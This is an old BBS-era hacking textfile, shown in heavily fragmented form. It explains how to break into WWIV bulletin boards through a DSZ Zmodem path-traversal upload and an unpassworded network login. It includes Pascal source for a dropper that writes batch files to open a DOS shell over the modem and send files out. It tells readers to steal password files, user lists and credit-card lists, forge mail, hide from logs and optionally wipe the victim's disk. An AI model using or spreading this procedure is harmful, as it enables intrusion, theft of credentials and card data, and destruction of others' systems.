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                 Hacking into WWIV, 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Vision (updated by Weas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, when unmodified and when not us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/protocols/programs, is essentially impregnable.  However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' Wayne Bell has also distributed the source code, extern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protocol support, and other nifty benefits tha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for a WWIV hack much easier.  This textfile will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s of hacking into WWIV via a hole in unregis The key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registered&lt;, since this hack works through DSZ's refus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oute Zmodem-batch downloads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your local WWIV board under a false alia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struggling and haven't had the time to 'register' D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nly work if they haven't registered DS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you have an account go straight to th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(to the SysOp).  When prompted for the file nam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\..\??.???".  You'll see the Zmodem receive string. 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ile NETWORK.COM.  The BBS will say, "transfer aborted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know better! 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back very shortly afterwards (thirty seconds approx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get the "NN:" prompt, enter "!-@NETWORK@-!" (agai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).  This will access the unpassworded WWIVnet accou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routines are external).  When the BBS sees th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to DOS and run NETWORK.EXE.  However, since COMs are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s, your NETWORK.COM will be executed!  NETWORK.COM t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atch files: HACK.BAT and DLZ.BAT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C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NETWO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TY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LZ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Z port1 speed2400 sz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TY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NETWORK.COM has created these two files,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.BAT which will turn control over to COM 1 and shell to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are in DOS, there are a few thing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DLZ.BAT to leech the target's CONFIG.DAT from his main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the one you were dumped in when you arrived). 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Z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&lt;filename&gt; is the name of the file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Z CONFI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eech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his BBS DATA directory.  This is usually C:\WWIV\DATA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have to look around a little bit.  When you find it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Z to leech the target's USER.LST.  Using Norton Utilities or any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text editor, it is very easy to see where the usern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assword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S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arget is in WWIVnet or WWIVlink, download his/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OUT.NET file from the aforementioned data directory.  Thi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S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HACK.BAT if you haven't al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round.  Leech anything that looks interesting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Private G-Files from the G-Fil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for --&lt; Lists of credit-card or calling-card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mail   \ Pir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 His dialing directories from Telemate or Telix;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contain passwords and numbers of private BBS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N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 up.  If you really hate him, upload Norton's WIPEDISK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rest of the files, run it, and permanently destr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ata on his drive.  This is generally not recommended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ar he has NO WAY of knowing you were in unless he w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ip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In the target's logs, nothing will show except that you hit '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ere online and quit before the upload started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ly always overlooked, and logs more than two days ol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In the target's net logs, he'll probably see a &gt;NO NET&lt;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Very close to the beginning of CONFIG.DAT and right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directory entry (usually "MSGS\") you will find the targ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ASSWORD.  This is needed if you are going to log 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 or a remot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If a sysop logs on, it is not noted in the LAST FEW CALLERS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A few commands that you will want to try out when you are onlin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U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BOARD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DIR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GFILE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CH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require the system password, but if you're onlin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you already hav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 You can have great fun with planted and rouge mailing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py of WWIV and the victim's CALLOUT.NET.  CALLOUT.NET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note after every entry that look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KAOIYQIGNADFUK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other random password.  Read WWIVTECH.DOC (available on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 boards) for more information.  You should be able to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rop off mail supposedly from and to your target very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bout a week.  When you start getting &gt;BAD PASSWORD&lt;,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to your victim's DOS and get the passwords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) You should be able to figure out what to do with the passwo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) NEVER, NEVER, NEVER press backspace when there is noth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!  This will have catastophic effects and will definin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 CT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) This file is provided to inform WWIV sysops of this threa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body uses it for "bad" purposes, it is not my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COM Port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may have noticed the batch files that NETWORK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(HACK.BAT and DLZ.BAT) are created to be run on a bb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modem as COM 1.  Due to the fact that all bbs's don't use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 have included the pascal source for NETWORK.COM so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as to turn control over to COM 2, 3, or 4.  Due to the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entire text file has been in pascal commenting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text file as the source to compile a modified NETOWRK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M 8192,0,0}          (* Leave memory for child proces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file :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      (diskfile,'hack.bat');          (* Creates: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rite      (diskfile);                     (* HACK.BAT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     (diskfile,'DEL NETWORK.COM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     (diskfile,'CTTY COM1');         (* Change port here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     (diskfile,'COMMAND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       (disk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      (diskfile,'dlz.bat');                   (* Creates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rite      (diskfile);                             (* DLZ.BAT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     (diskfile,'CLS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     (diskfile,'CTTY CON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     (diskfile,'DSZ port1 speed2400 sz %1'); (* change port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     (diskfile,'CTTY COM1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     (diskfile,'CLS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       (disk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Vectors;                                      (****************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         (GetEnv('COMSPEC'), '/C hack.bat');  (* runs HACK.BAT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Vectors;                                      (*****************)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=---\----/--i--s--i--o--n---=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ed From P-80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